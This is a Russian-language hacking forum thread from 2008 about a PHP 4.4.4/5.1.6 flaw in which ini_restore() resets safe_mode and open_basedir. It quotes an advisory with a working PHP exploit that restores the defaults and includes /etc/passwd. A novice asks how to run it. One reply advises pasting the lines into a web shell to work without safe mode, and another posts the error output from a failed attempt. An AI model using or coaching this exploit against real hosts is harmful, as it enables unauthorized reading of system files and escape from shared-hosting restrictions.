PHP 5.1.6 Exploit

PHP 5.1.6 Exploit

11.06.2008, 13:25

fasty

Познающий

Регистрация: 09.05.2008

Сообщений: 67

С нами: 9476389

Репутация: 13

PHP 5.1.6 Exploit

Нужна помощь)
Каким образом воплотить в жизнь Exploit?

Программа:
PHP 4.4.4 и более ранние версии
PHP 5.1.6 и более ранние версии

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователь получить доступ к важным данным на системе.

Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках виртуального хоста Web сервера, а в файле php.ini находятся значения по умолчанию, злоумышленник может восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле Web сервера. Пример уязвимой конфигурации:
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
Эксплоит:
Код

PHP код:


		
			
<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

Удачная эксплуатация уязвимости позволит злоумышленнику получить доступ к содержимому произвольных файлов на системе.

Если можно пошагово опишите я новичёк...
С помощью какой проги или чё устанавливать чтобы это зделать) Нигде не могу найти ..

Спасибо.

𝕏 Twitter Reddit Telegram Копировать ссылку

11.06.2008, 17:17

ShAnKaR

Постоянный

Регистрация: 14.07.2005

Сообщений: 964

С нами: 10960226

Репутация: 1424

если в php.ini нет сейфмода а в httpd.conf к примеру стоит php_value safe_mode "1"
то с помощью этой баги можно попробовать востановить значение опции safe_mode. практически это выглядит так- вставляешь в шел эти строчки и юзаешь его без сейф мода.

11.06.2008, 21:44

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

С нами: 9736147

Репутация: 155

попробовал на PHP 5.1.6 чето не канает
выдает
1/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/) in /home/хост/vhosts/имяакка/1.php on line 4

Fatal error: Can't load /etc/passwd, open_basedir restriction. in /home/хост/vhosts/имяакка/1.php on line 4